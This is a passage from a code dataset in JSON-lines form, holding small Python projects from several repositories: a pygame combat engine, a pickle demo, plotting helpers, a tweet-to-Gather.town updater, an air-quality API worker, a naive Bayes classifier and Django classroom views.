ic,(x,y,w,h))\r\n smallText = pygame.font.SysFont(\"times\",20)\r\n textSurf, textRect = text_objects(msg, smallText, black)\r\n textRect.center = ( (x+(w/2)), (y+(h/2)) )\r\n gameDisplay.blit(textSurf, textRect)\r\n\r\n\r\nclass Background(pygame.sprite.Sprite):\r\n def __init__(self, image_file, location):\r\n pygame.sprite.Sprite.__init__(self) #call Sprite initializer\r\n self.image = pygame.image.load(image_file)\r\n self.rect = self.image.get_rect()\r\n self.rect.left, self.rect.top = location\r\n\r\nBackGround = Background('B1.png', [0,0])\r\n\r\n#--------------------------------------------------------------------------------------------\r\n\r\nclass Combat:\r\n def __init__(self, player, enemy):\r\n self.player = player\r\n self.enemy = Enemy.enemies[enemy]\r\n self.EHP = self.enemy.hp\r\n self.enemypic = pygame.image.load(enemy + \".png\")\r\n self.enemypic = pygame.transform.scale(self.enemypic, (200, 200))\r\n self.plarmor = 5\r\n if self.player.armor[0] == True:\r\n self.plarmor += Items.items[self.player.armor[1]].defence\r\n self.run = True\r\n self.plAlive = True\r\n self.playerW1 = 0\r\n if self.player.righthand[0] == True:\r\n self.playerW1 = Items.items[self.player.righthand[1]].damage\r\n self.playerW2 = 0\r\n if self.player.lefthand[0] == True:\r\n self.playerW2 = Items.items[self.player.lefthand[1]].damage\r\n\r\n self.rawDam = self.playerW1 + self.playerW2 + self.player.strength\r\n self.enemyAlive = True\r\n\r\n\r\n\r\n#--------------------------------------------------------------------------------------------\r\n def blackout(self):\r\n counter = 0\r\n \r\n while counter != 30:\r\n \r\n for event in pygame.event.get():\r\n print(event)\r\n if event.type == pygame.QUIT:\r\n break\r\n gameDisplay.fill(black)\r\n\r\n if counter >= 5:\r\n medText = pygame.font.SysFont(\"times\",30)\r\n TextSurf, TextRect = text_objects(\"You got away safely\", medText, white)\r\n TextRect.center = ((display_width/2),(display_height/2))\r\n gameDisplay.blit(TextSurf, TextRect)\r\n\r\n pygame.display.update()\r\n clock.tick(15)\r\n counter += 1\r\n\r\n def death(self):\r\n counter = 0\r\n \r\n while counter != 45:\r\n \r\n for event in pygame.event.get():\r\n print(event)\r\n if event.type == pygame.QUIT:\r\n break\r\n gameDisplay.fill(red)\r\n\r\n if counter >= 5:\r\n medText = pygame.font.SysFont(\"times\",30)\r\n TextSurf, TextRect = text_objects(\"You Died\", medText, black)\r\n TextRect.center = ((display_width/2),(display_height/2))\r\n gameDisplay.blit(TextSurf, TextRect)\r\n\r\n pygame.display.update()\r\n clock.tick(15)\r\n counter += 1\r\n\r\n\r\n def escape(self):\r\n if self.player.agility > self.enemy.agl:\r\n self.run = False\r\n self.blackout()\r\n\r\n else:\r\n if random.choice([1,2,3,4,5,6,7,8,9,10]) > 5:\r\n self.run = False\r\n self.blackout()\r\n else:\r\n self.enemyTurn()\r\n\r\n def win(self):\r\n drops = []\r\n for drop in self.enemy.drops:\r\n counter = drop[1]\r\n for x in range(counter):\r\n drops.append(drop[0])\r\n\r\n drop = random.choice(drops)\r\n self.player.inventory.addItem(drop, 1)\r\n self.player.inventory.gold += self.enemy.gold\r\n self.run = False\r\n \r\n\r\n\r\n def enemyTurn(self):\r\n self.player.health -= self.calcEnemyDamage()\r\n\r\n def defend(self):\r\n self.player.health -= int(self.calcEnemyDamage() * .5)\r\n if self.player.health <= 0:\r\n self.plAlive = False\r\n \r\n def fight(self):\r\n self.enemy.hp -= self.rawDam\r\n self.enemyTurn()\r\n\r\n def skill(self):\r\n if self.player.mana >= 20:\r\n if self.player.health < 
(self.player.maxHealth-50):\r\n self.player.health+=50\r\n self.player.mana-=20\r\n else:\r\n self.player.health=self.player.maxHealth\r\n self.player.mana-=20\r\n self.enemyTurn()\r\n \r\n # Returns how much damage an enemy will do to the player\r\n def calcEnemyDamage(self):\r\n return int(self.enemy.attack * ((100 - self.plarmor)/100))\r\n\r\n#Combat-------------------------------------------------------------------------\r\n\r\n def combat_intro(self):\r\n\r\n while self.run and self.plAlive:\r\n for event in pygame.event.get():\r\n print(event)\r\n if event.type == pygame.QUIT:\r\n break\r\n \r\n gameDisplay.fill(white)\r\n gameDisplay.blit(BackGround.image, BackGround.rect)\r\n largeText = pygame.font.SysFont(\"times\", 100)\r\n medText = pygame.font.SysFont(\"times\",30)\r\n\r\n \r\n gameDisplay.blit(self.enemypic, (600,200))\r\n\r\n\r\n text(\"Cur HP\",200,100,100,50,white)\r\n text(\"Enemy HP\",200,150,100,50,white)\r\n button(\"Heal Spell\",100,700,100,50,green,bright_green,self.skill)\r\n text(str(self.player.health),300,100,100,50,white )\r\n text(str(self.enemy.hp),300,150,100,50,white)\r\n text(str(self.player.mana),100,650,100,50,white)\r\n button(\"Fight\",300,700,100,50,green,bright_green,self.fight)\r\n button(\"Defend\",500,700,100,50,green,bright_green,self.defend) \r\n button(\"Run\",700,700,100,50,red,bright_red,self.escape)\r\n \r\n\r\n pygame.display.update()\r\n clock.tick(15)\r\n\r\n if self.player.health <= 0:\r\n self.plAlive = False\r\n\r\n if self.enemy.hp <=0:\r\n self.enemyAlive = False\r\n self.win()\r\n\r\n if self.plAlive == False:\r\n self.death()\r\n \r\n self.enemy.hp = self.EHP\r\n return self.plAlive, self.player \r\n","repo_name":"bsuncin/SE_Game","sub_path":"CombatEngine.py","file_name":"CombatEngine.py","file_ext":"py","file_size_in_byte":7565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73171779763","text":"import pickle\n# import dill as pickle\n\nclass MyClass:\n __my_lambda = staticmethod(lambda x: x * x + 1)\n\n def __init__(self):\n self.a_number = 35\n self.a_string = \"hey\"\n self.a_list = [1, 2, 3]\n self.a_dict = {\"first\": \"a\", \"second\": 2, \"third\": [1, 2, 3]}\n self.a_tuple = (22, 23)\n self.a_lambda = self.__my_lambda\n\n def print_attrs(self):\n for attr in self.__dict__:\n if attr.startswith(\"a_\"):\n print(self.__dict__[attr])\n\n def __getstate__(self):\n attributes = self.__dict__.copy()\n del attributes['a_lambda']\n return attributes\n \n def __setstate__(self, state):\n self.__dict__ = state\n self.a_lambda = self.__my_lambda\n\n \nmc = MyClass()\nmc_pickled = pickle.dumps(mc)\nmc_unpickled = pickle.loads(mc_pickled)\nmc_unpickled.print_attrs()\nprint(mc_unpickled.a_lambda(2))","repo_name":"still-coding/academyit_python_oop","sub_path":"code/p9_serde/pickle_serde.py","file_name":"pickle_serde.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74838062641","text":"# (C) Ozgur Taylan TURAN 2019, Nov. 
(Delft University of Technology)\n# Import General Modules\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nplt.matplotlib.rc('xtick', labelsize=12)\nplt.matplotlib.rc('ytick', labelsize=12)\nplt.rcParams.update({'font.size': 16})\n################################################################################\n# 3D Plotting Option for GP\n################################################################################\ndef GP_3D_Surrogate(X,y,x1,x2,mean,std=None):\n fig = plt.figure(figsize=(8,5));\n ax = fig.add_subplot(111,projection='3d');\n ax.scatter(X[:,0],X[:,1],y,color='r');\n if std is None:\n surf = ax.plot_surface(x1, x2, mean, cmap=plt.cm.CMRmap, linewidth=0,\n antialiased=True, alpha=0.5);\n else:\n surf = ax.plot_surface(x1, x2, mean-2*std, cmap='binary', linewidth=0,\n antialiased=True, alpha=0.3);\n surf = ax.plot_surface(x1, x2, mean+2*std, cmap='binary', linewidth=0,\n antialiased=True, alpha=0.3);\n surf = ax.plot_surface(x1, x2, mean, cmap=plt.cm.CMRmap, linewidth=0,\n antialiased=True, alpha=0.5);\n ax.set_xlabel('x1');ax.set_ylabel('x2');ax.set_zlabel('x3')\n fig.colorbar(surf)\n################################################################################\n# 2D Plotting Option for GP\n################################################################################\ndef GP_2D_Surrogate(X, y, x, mean, std):\n plt.fill_between(x.ravel(),mean.ravel() + 2 * std,mean.ravel() - 2 * std,\n alpha=0.2,color='deepskyblue');\n plt.fill_between(x.ravel(),mean.ravel() + 1 * std,mean.ravel() - 1 * std,\n alpha=0.3,color='deepskyblue');\n\n plt.plot(x,mean,label='Surrogate-Function',color='deepskyblue')\n plt.plot(X,y,'o',markersize=6,color='deepskyblue',alpha=1,label='Sample Points')\n plt.xlabel('X')\n plt.ylabel('y')\n plt.title('2D GP Regression')\n #plt.legend()\n","repo_name":"taylanot/GP","sub_path":"Regression/GP_Plot_Reg.py","file_name":"GP_Plot_Reg.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31605005703","text":"import os\nimport requests\nimport textwrap\nimport json\nfrom time import sleep\nfrom PIL import Image, ImageDraw\n\nfrom config import (\n twitter_token,\n twitter_userid,\n gather_api_key,\n gather_space_id,\n gather_object_name,\n domain,\n gather_map_id,\n)\n\n\nBACKGROUND_COLOR = (16, 16, 16)\nTEXT_COLOR = (251, 224, 114)\nSTATIC_FOLDER = 'static'\n\nPORT = 8000\n\n\ndef format_tweet_text(text):\n if 'https://t.co' in text:\n link_index = text.index('https://t.co')\n text = text[:link_index]\n if len(text) > 140:\n text = text[:140]\n if ' ' in text:\n for symbol in text[::-1]:\n if symbol == ' ':\n index_of_first_space_in_returned_text = text[::-1].index(\n symbol)\n break\n index_of_last_space = len(\n text) - index_of_first_space_in_returned_text\n text = text[:index_of_last_space]\n text = text[:140] + ' [...]'\n return text\n\n\ndef make_payload(map_id=None, map_content=None):\n return {\n \"apiKey\": gather_api_key,\n \"spaceId\": gather_space_id,\n \"mapId\": map_id,\n \"mapContent\": map_content,\n }\n\n\ndef update_object_image(map_id, name, img):\n headers = {\"Content-type\": \"application/json\", \"Accept\": \"text/plain\"}\n new_payload = make_payload(map_id=map_id)\n data = requests.get(\"https://gather.town/api/getMap\", params=new_payload)\n map_data = data.json()\n objects = map_data[\"objects\"]\n for obj in objects:\n if obj[\"_name\"] == name:\n obj[\"highlighted\"] = img\n obj[\"normal\"] = img\n 
break\n    map_data[\"objects\"] = objects\n    new_payload = make_payload(map_id=map_id, map_content=map_data)\n    requests.post(\n        \"https://gather.town/api/setMap\",\n        data=json.dumps(new_payload),\n        headers=headers,\n    )\n\nlast_tweet_id = 0\n\nwhile True:\n    tweet_id = 0\n\n    response = requests.get(\n        'https://api.twitter.com/2/users/{}/tweets?max_results=5'.format(\n            twitter_userid),\n        headers={'Authorization': 'Bearer {}'.format(twitter_token)})\n    try:\n        jsondata = response.json()\n        tweet = jsondata['data'][0]\n        text = format_tweet_text(tweet['text'])\n        tweet_id = tweet['id']\n        if tweet_id != last_tweet_id:\n            print(\"Updating\")\n            img = Image.new('RGB', (256, 64), color=BACKGROUND_COLOR)\n\n            d = ImageDraw.Draw(img)\n            d.text((4, 4), textwrap.fill(text.encode(\n                'latin-1', 'ignore').decode(), width=42), fill=TEXT_COLOR)\n\n            if not os.path.exists(STATIC_FOLDER):\n                os.makedirs(STATIC_FOLDER)\n\n            img.save('./{}/{}.png'.format(STATIC_FOLDER, tweet_id))\n            update_object_image(gather_map_id, gather_object_name,\n                                '{}/{}.png'.format(domain, tweet_id))\n\n            last_tweet_id = tweet_id\n    except Exception:\n        print('Could not update tweet')\n\n\n    sleep(60)\n","repo_name":"GoodPraxis/gather-tweet-display","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"11793158242","text":"import json\nimport requests\nimport sqlite3 as db\n\nparams = {\n    'description':'python',\n}\nresponse = requests.get(\"https://jobs.github.com/positions.json?\",params = params,timeout = 3)\n\ndef insert(cursor,job):\n    insert_query = 'insert into jobs(title,type,company) values(:title,:type,:company)'\n    cursor.execute(insert_query,{'title':job['title'],'type':job['type'],'company':job['company']})\n\n\ndef get_job_counts_by_companies(cursor):\n    pass\n\nif(response.ok):\n    jobs_json = response.json()\n    print(jobs_json)\n    json_string = json.dumps(jobs_json,indent=4)\n    print(json_string)\n    connection = db.connect(\"jobs_database.db\")\n    cursor = connection.cursor()\n    jobs_table_query = '''\n    CREATE TABLE IF NOT EXISTS jobs(\n    id INTEGER PRIMARY KEY AUTOINCREMENT,\n    title text,\n    type text,\n    company text\n    )\n    '''\n    cursor.execute(jobs_table_query)\n    for job in jobs_json:\n        insert(cursor,job)\n    connection.commit()\n\n    cursor.close()\n    connection.close()\n\nelse:\n    print(\"some error happened with status code \",response.status_code)","repo_name":"sparrowV/hands_on_python","sub_path":"json_api_database/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"36508049791","text":"import nltk\nimport pickle as pkl\nfrom gensim.models import Word2Vec\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nimport numpy as np\nimport parsers as pr\nfrom scipy import spatial\nimport pandas as pd\nimport os \ndef run(jd,corpus):\n\tmodel = Word2Vec.load('w2v_model')\n\tw2v = []\n\tjd = [PorterStemmer().stem(word) for word in nltk.word_tokenize(jd) if word not in stopwords.words('english') and word.isalnum()]\n\tfor word in jd:\n\t\tif word in model.wv.vocab:\n\t\t\tw2v.append(model.wv[word])\n\tvjd = np.mean(w2v, axis=0)\n\n\tvcv = []\n\tfor cvs in corpus:\n\t\tw2v = []\n\t\twith open(cvs, 'rb') as f:\n\t\t\tcv = pkl.load(f)\n\t\t\tfor word in cv:\n\t\t\t\tif word in model.wv.vocab:\n\t\t\t\t\tw2v.append(model.wv[word])\n\t\tvcv.append((np.mean(w2v, axis=0), 
cvs.split('/')[-1].split('.')[0]))\n\n\tres = []\n\tfor i in range(0, len(vcv)):\n\t\tres.append((1 - spatial.distance.cosine(vjd, vcv[i][0]), vcv[i][1]))\n\t#for i in range(0, len(cvc)):\n\t# retrieval.append((1 - spatial.distance.cosine(vjd, vcv[i][0]), vcv[i][1]))\n\n\tres.sort(reverse=True)\n\tprint(res[:15])\n\t\n\twith open('oput.pkl', 'wb') as op:\n\t\tpkl.dump(res, op)\n\n\tdf = pd.read_csv(\"db.csv\")\n\tresponse = {'cid':[], 'score':[], 'path':[]}\n\tfor i in range(20):\n\t\tresponse['cid'].append(res[i][1])\n\t\tresponse['score'].append(\"{:.1f}\".format(res[i][0]*100))\n\t\tresponse['path'].append(df[df['cid']==int(res[i][1])]['cv'].values[0])\n\n\treturn response\n\nif __name__ == '__main__':\n\twith open('jd.txt', 'r') as jd:\n\t\tgg = jd.read()\n\n\tresult = run(gg, pr.explore('corpus/tokenized'))\n\tprint(pd.DataFrame(result))\n\n\n\n\n","repo_name":"avinash3108/Recruitment-Assistant-using-NLP","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"36070717662","text":"from django.urls import path\n\nfrom . import views\nfrom .views import *\n\n\n\napp_name = 'accounts' # for using in app urls # path('ticketing/', include('ticketing.urls'))\nurlpatterns = [\n path('login', views.login_view , name='login'),\n path('logout', views.logout_view, name='logout'),\n path('profile/details', views.profile_details, name='profile_details'),\n path('profile/edit', views.profile_edit, name='profile_edit'),\n\n path('register', views.register, name='register'),\n\n path('payment/list', payment_list, name='payment_list'),\n path('payment/details/', payment_details, name='payment_details'),\n path('payment/create', payment_create, name='payment_create'),\n\n]","repo_name":"ohashemzadeh/cinema-django","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"22616876272","text":"import json\nfrom node_listener.worker import Worker\nimport urllib\nimport urllib.error\nimport urllib.request\nimport urllib.parse\nimport node_listener.service.air_pollution as air\nfrom node_listener.service.hd44780_40_4 import Dump\n\n\nclass OpenaqWorker(Worker):\n url = \"https://api.openaq.org/v1/latest?\"\n\n def __init__(self, city, location, user_agent):\n self.city = city\n self.location = location\n self.user_agent = user_agent\n self._validate()\n\n def _validate(self):\n if self.city is None and self.location is None:\n raise AttributeError(\"city or location must be set\")\n\n def _fetch_data(self, url):\n try:\n request = urllib.request.Request(\n url, None, {'User-Agent': self.user_agent}\n )\n response = urllib.request.urlopen(request)\n data = response.read()\n json_data = json.loads(data.decode())\n Dump.module_status({'name': 'opnAQ', 'status': 2})\n except ValueError as e:\n json_data = None\n Dump.module_status({'name': 'opnAQ', 'status': 4})\n except urllib.error.HTTPError as e:\n print(e)\n json_data = None\n Dump.module_status({'name': 'opnAQ', 'status': 4})\n except urllib.error.URLError as e:\n print(e)\n json_data = None\n Dump.module_status({'name': 'opnAQ', 'status': 4})\n except ConnectionResetError as e:\n print(e)\n json_data = None\n Dump.module_status({'name': 'opnAQ', 'status': 4})\n except:\n Dump.module_status({'name': 'opnAQ', 'status': 5})\n raise\n\n return json_data\n\n def _get_url(self):\n url 
= self.url\n if self.city is not None:\n url = url + \"city=\"+urllib.parse.quote(self.city)\n\n if self.location is not None:\n if self.city is not None:\n url = url+\"&\"\n url = url + \"location=\"+urllib.parse.quote(self.location)\n\n return url\n\n def _normalize(self, data):\n values = {}\n for entry in data['results']:\n values[entry['location']] = {\n \"PM10\": None,\n \"PM25\": None,\n \"CO\": None,\n \"O3\": None,\n \"SO2\": None,\n \"NO2\": None,\n \"BC\": None\n }\n for measurement in entry['measurements']:\n if measurement['parameter'] == \"pm10\":\n values[entry['location']][\"PM10\"] = {\n 'index': air.air_index_pm10(measurement[\"value\"]),\n 'date': measurement['lastUpdated']\n }\n\n if measurement['parameter'] == \"pm25\":\n values[entry['location']][\"PM25\"] = {\n 'index': air.air_index_pm25(measurement[\"value\"]),\n 'date': measurement['lastUpdated']\n }\n\n if measurement['parameter'] == \"co\":\n values[entry['location']][\"CO\"] = {\n 'index': air.air_index_co(measurement[\"value\"]),\n 'date': measurement['lastUpdated']\n }\n\n if measurement['parameter'] == \"so2\":\n values[entry['location']][\"SO2\"] = {\n 'index': air.air_index_so2(measurement[\"value\"]),\n 'date': measurement['lastUpdated']\n }\n\n if measurement['parameter'] == \"no2\":\n values[entry['location']][\"NO2\"] = {\n 'index': air.air_index_no2(measurement[\"value\"]),\n 'date': measurement['lastUpdated']\n }\n\n if measurement['parameter'] == \"o3\":\n values[entry['location']][\"O3\"] = {\n 'index': air.air_index_o3(measurement[\"value\"]),\n 'date': measurement['lastUpdated']\n }\n\n if measurement['parameter'] == \"bc\":\n values[entry['location']][\"BC\"] = {\n 'index': air.air_index_so2(measurement[\"value\"]),\n 'date': measurement['lastUpdated']\n }\n\n return values\n\n def execute(self):\n data = self._fetch_data(self._get_url())\n if data:\n return self._normalize(data)\n\n return {}\n","repo_name":"bkosciow/sensor_listener","sub_path":"node_listener/worker/openaq_worker.py","file_name":"openaq_worker.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22677729454","text":"import numpy as np\n\nx1 = np.array([1, 1, -1, 1, 3])\nx2 = np.array([-1,1,1,2,-1])\nx3 = np.array([2,3,0,-4,-1])\nx = np.array([x1, x2, x3]).T\n\ny = np.array([1,4,-1,-2,0]).T\nw = np.array([-1,1,-1])\nb = -1\n\ndb = y - np.dot(x,w) - b\ndw = x.T.dot(db) / 5\ndb = 1/5 * db\nprint('dw is ',dw)\nprint('db is ', db)\n\nw = np.zeros(4)\nlr = 0.1\nx = np.array([x1, x2, x3, np.ones(5)]).T\ndb = 0\ndw = np.zeros(4)\n\nfor i in np.arange(5):\n ins = y[i] - np.dot(x[i],w)\n dw += x[i].T.dot(ins) / (i + 1)\n print('stochastic gradient at example ', i + 1, ' is ', dw)\n\n w = w - lr * dw\n\n print('[w1, w2, w3, b] = ', w)","repo_name":"sabinamiani/ML-tech","sub_path":"cs5350hw2q5.py","file_name":"cs5350hw2q5.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19694064916","text":"from __future__ import print_function\r\nimport sklearn\r\nimport nltk\r\nimport csv\r\nimport re\r\nimport numpy\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.neural_network import MLPClassifier\r\n\r\ndef 
GetData():\r\n\twith open('train_set_x.csv') as csvfile:\r\n\t\treadTest = csv.reader(csvfile, delimiter=',')\r\n\t\ttrainData = []\r\n\t\tfor row in readTest:\r\n\t\t\ttrainData.append(row[1])\r\n\t\t\r\n\t\ttrainData.pop(0)\r\n\treturn trainData\r\n\r\ndef GetData2():\r\n\twith open('test_set_x.csv') as csvfile:\r\n\t\treadTest = csv.reader(csvfile, delimiter=',')\r\n\t\ttrainData = []\r\n\t\tfor row in readTest:\r\n\t\t\ttrainData.append(row[1])\r\n\t\t\r\n\t\ttrainData.pop(0)\r\n\treturn trainData\r\n\r\ndef GetTarget():\r\n\twith open('train_set_y.csv') as csvfile:\r\n\t\treadTest = csv.reader(csvfile, delimiter=',')\r\n\t\ttestTarget = []\r\n\t\tfor row in readTest:\r\n\t\t\ttestTarget.append(row[1])\r\n\t\ttestTarget.pop(0)\r\n\treturn testTarget\r\n\r\nprobs={}\r\ndef proportions(c):\r\n if c not in probs:\r\n i=0\r\n numLetter=[0,0,0,0,0]\r\n for sentence in trainDataLetterized:\r\n for letter in sentence:\r\n if letter==c:\r\n numLetter[int(testTarget[i])]+=1\r\n i+=1\r\n probLetter=[]\r\n i=0\r\n for num in numLetter:\r\n probLetter.append(num/float(numLang[i]))\r\n i+=1\r\n probs[c]=probLetter\r\n return probs[c]\r\n\r\ntrainData=GetData()\r\ntrainDataLetterized=[]\r\nfor sentence in trainData:\r\n trainDataLetterized.append(list(sentence))\r\n\r\ntestTarget=GetTarget()\r\n\r\nnumLang=[0,0,0,0,0]\r\notherNumLang=[0,0,0,0,0]\r\ni=0\r\nfor sentence in trainDataLetterized:\r\n otherNumLang[int(testTarget[i])]+=1\r\n for letter in sentence:\r\n if letter!=' ':\r\n numLang[int(testTarget[i])]+=1\r\n i+=1\r\n\r\ntestData=GetData2()\r\ntestDataLetterized=[]\r\nfor sentence in testData:\r\n testDataLetterized.append(list(sentence))\r\ntotal=len(trainData) \r\nfrequency=[]\r\nfor num in otherNumLang:\r\n frequency.append(num/float(total)) \r\nguess=[]\r\nfor sentence in testDataLetterized:\r\n product=[1,1,1,1,1]\r\n for character in sentence:\r\n if character != ' ':\r\n for i in range(5):\r\n product[i]*=proportions(character)[i]\r\n maxIndex=0\r\n for i in range(5):\r\n product[i]*=frequency[i]\r\n for i in range(5):\r\n if product[i]>product[maxIndex]:\r\n maxIndex=i\r\n guess.append(maxIndex)\r\n\r\nwith open(\"theoutput.csv\",'wb') as predictions:\r\n\t\twr = csv.writer(predictions, delimiter=',')\r\n\t\twr.writerow(['Id','Category'])\r\n\t\tfor idx, value in enumerate(guess):\r\n\t\t\twr.writerow([idx, value])","repo_name":"msalihs/COMP-551-Project-2","sub_path":"Naive Bayes/naivebayes.py","file_name":"naivebayes.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6903400058","text":"import sqlite3\n\nconnect = sqlite3.connect('emaildb.sqlite')\ncur = connect.cursor()\n\ncur.execute('''\nDROP TABLE IF EXISTS Counts''')\n\ncur.execute('''\nCREATE TABLE Counts (org TEXT, count INTEGER)''')\n\nfilename = raw_input('Enter file name: ')\nif len(filename) < 1:\n filename = 'mbox.txt'\n\ndbhandle = open(filename)\nfor line in dbhandle:\n\n if not line.startswith('From: '):\n continue\n else:\n email = line.split()[1]\n org = email.split('@')[1]\n cur.execute('SELECT count FROM Counts WHERE org = ? 
', (org, ))\n\n try:\n count = cur.fetchone()[0]\n cur.execute('UPDATE Counts SET count=count+1 WHERE org = ?', (org, ))\n except:\n cur.execute('INSERT INTO Counts (org, count) VALUES (?, 1)', (org, ))\nconnect.commit()\n","repo_name":"UncleGarden/python-sqlite","sub_path":"email/emaildb.py","file_name":"emaildb.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23016935762","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.views import View\nfrom django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin\nfrom django.contrib import messages\nfrom django.apps import apps\nfrom django.http import Http404\nfrom django.forms import modelform_factory\nfrom .models import Classroom, Stream\nfrom .forms import CreateClassForm, JoinClassForm\nfrom django import forms\nfrom django.utils import timezone\n\n\nclass HomeView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n user = self.request.user\n if user.is_teacher:\n classrooms = user.classrooms.all()\n form = CreateClassForm()\n else:\n classrooms = Classroom.objects.filter(\n students__in=[self.request.user]\n )\n form = JoinClassForm()\n return render(request, 'home.html', {'classrooms': classrooms, 'form': form})\n\n\nclass CreateClassView(LoginRequiredMixin, UserPassesTestMixin, View):\n def post(self, request, *args, **kwargs):\n form = CreateClassForm(data=self.request.POST)\n if form.is_valid():\n return self.form_valid(form)\n return self.form_invalid(form)\n\n def form_valid(self, form):\n form.instance.teacher = self.request.user\n form.save()\n messages.info(self.request, 'Classroom Created!')\n return redirect('home')\n\n def form_invalid(self, form):\n messages.warning(\n self.request, 'Some Error Occured: Classroom Not Created!')\n return redirect('home')\n\n def test_func(self):\n return self.request.user.is_teacher\n\n\nclass JoinClassView(LoginRequiredMixin, UserPassesTestMixin, View):\n def post(self, request, *args, **kwargs):\n form = JoinClassForm(data=self.request.POST)\n if form.is_valid():\n return self.form_valid(form)\n return self.form_invalid(form)\n\n def form_valid(self, form):\n classroom = Classroom.objects.filter(code=form.cleaned_data['code'])\n if classroom.exists():\n classroom.first().students.add(self.request.user)\n messages.info(self.request, 'Classroom Joined!')\n return redirect('home')\n messages.info(self.request, 'Classroom Not Found!')\n return redirect('home')\n\n def form_invalid(self, form):\n messages.warning(\n self.request, 'Some Error Occured: Classroom Not Joined!')\n return redirect('home')\n\n def test_func(self):\n return not self.request.user.is_teacher\n\n\nclass DashboardView(LoginRequiredMixin, View):\n def get(self, request, *args, **kwargs):\n classroom = get_object_or_404(Classroom, code=self.kwargs['code'])\n streams = classroom.streams.all()\n if self.request.user.is_teacher:\n upcoming_tests = classroom.classroom_test.filter(\n due_date__gt=timezone.now()\n )\n upcoming_assignments = classroom.classroom_assignment.filter(\n due_date__gt=timezone.now()\n )\n else:\n upcoming_tests = classroom.classroom_test.filter(\n due_date__gt=timezone.now(),\n ).exclude(test_submissions__student__in=[self.request.user])\n upcoming_assignments = classroom.classroom_assignment.filter(\n due_date__gt=timezone.now()\n ).exclude(assignment_submissions__student__in=[self.request.user])\n return render(request, 
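# hand the template the stream feed plus the role-specific upcoming work computed above\n 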
\"dashboard.html\", {'classroom': classroom, 'streams': streams, 'upcoming_tests': upcoming_tests, 'upcoming_assignments': upcoming_assignments})\n\n# for teacher to create and update stream\n\n\nclass StreamCreateUpdateView(LoginRequiredMixin, UserPassesTestMixin, View):\n def get(self, request, *args, **kwargs):\n self.set_objects()\n form = self.get_form(instance=self.stream_obj)\n return render(request, 'partials/stream_form.html', {'form': form, 'model_name': self.model_name, 'code': self.kwargs['code'], 'stream_id': self.stream_id, 'stream_obj': self.stream_obj})\n\n def post(self, request, *args, **kwargs):\n self.set_objects()\n form = self.get_form(\n instance=self.stream_obj, data=self.request.POST, files=self.request.FILES\n )\n if form.is_valid():\n form.instance.classroom = get_object_or_404(\n Classroom, code=self.kwargs['code'], teacher=self.request.user\n )\n form.instance.teacher = self.request.user\n stream_obj = form.save()\n # if new object is created\n if self.stream_obj is None:\n Stream.objects.create(\n classroom=stream_obj.classroom,\n stream_obj=stream_obj\n )\n messages.success(self.request, 'Stream Updated !')\n return redirect('dashboard', self.kwargs['code'])\n\n messages.warning(self.request, 'Some Error Occured !')\n return redirect('dashboard', self.kwargs['code'])\n\n def get_model(self, model_name):\n if model_name in ('announcement', 'test', 'assignment',):\n return apps.get_model(app_label='classroom', model_name=model_name)\n raise Http404()\n\n def get_form(self, *args, **kwargs):\n form = modelform_factory(self.model,\n exclude=('classroom', 'teacher'),\n widgets={\n 'due_date': forms.DateInput(attrs={'type': 'date'})\n }\n )\n return form(*args, **kwargs)\n\n def set_objects(self):\n self.model_name = self.kwargs['model_name']\n self.model = self.get_model(self.model_name)\n self.stream_obj = None\n self.stream_id = self.kwargs.get('stream_id')\n if self.stream_id:\n self.stream_obj = get_object_or_404(\n self.model, id=self.stream_id, teacher=self.request.user\n )\n\n def test_func(self):\n return self.request.user.is_teacher\n\n# for teacher to delete stream\n\n\nclass StreamDeleteView(LoginRequiredMixin, View):\n def post(self, request, *args, **kwargs):\n stream = get_object_or_404(Stream, id=self.kwargs['stream_id'])\n stream_obj = stream.stream_obj\n if stream_obj.teacher != self.request.user:\n raise Http404()\n classroom = stream_obj.classroom\n stream_obj.delete()\n stream.delete()\n messages.success(self.request, 'Stream Updated !')\n return redirect('dashboard', classroom.code)\n\n# detail view for stream (student)\n\n\nclass StreamDetailView(LoginRequiredMixin, UserPassesTestMixin, View):\n def get(self, request, *args, **kwargs):\n model_name = self.kwargs['model_name']\n model_id = self.kwargs['model_id']\n submission_id = None\n if model_name == 'assignment':\n model = apps.get_model(\n app_label='classroom', model_name='assignment'\n )\n submission_model = get_object_or_404(\n model, id=model_id\n )\n 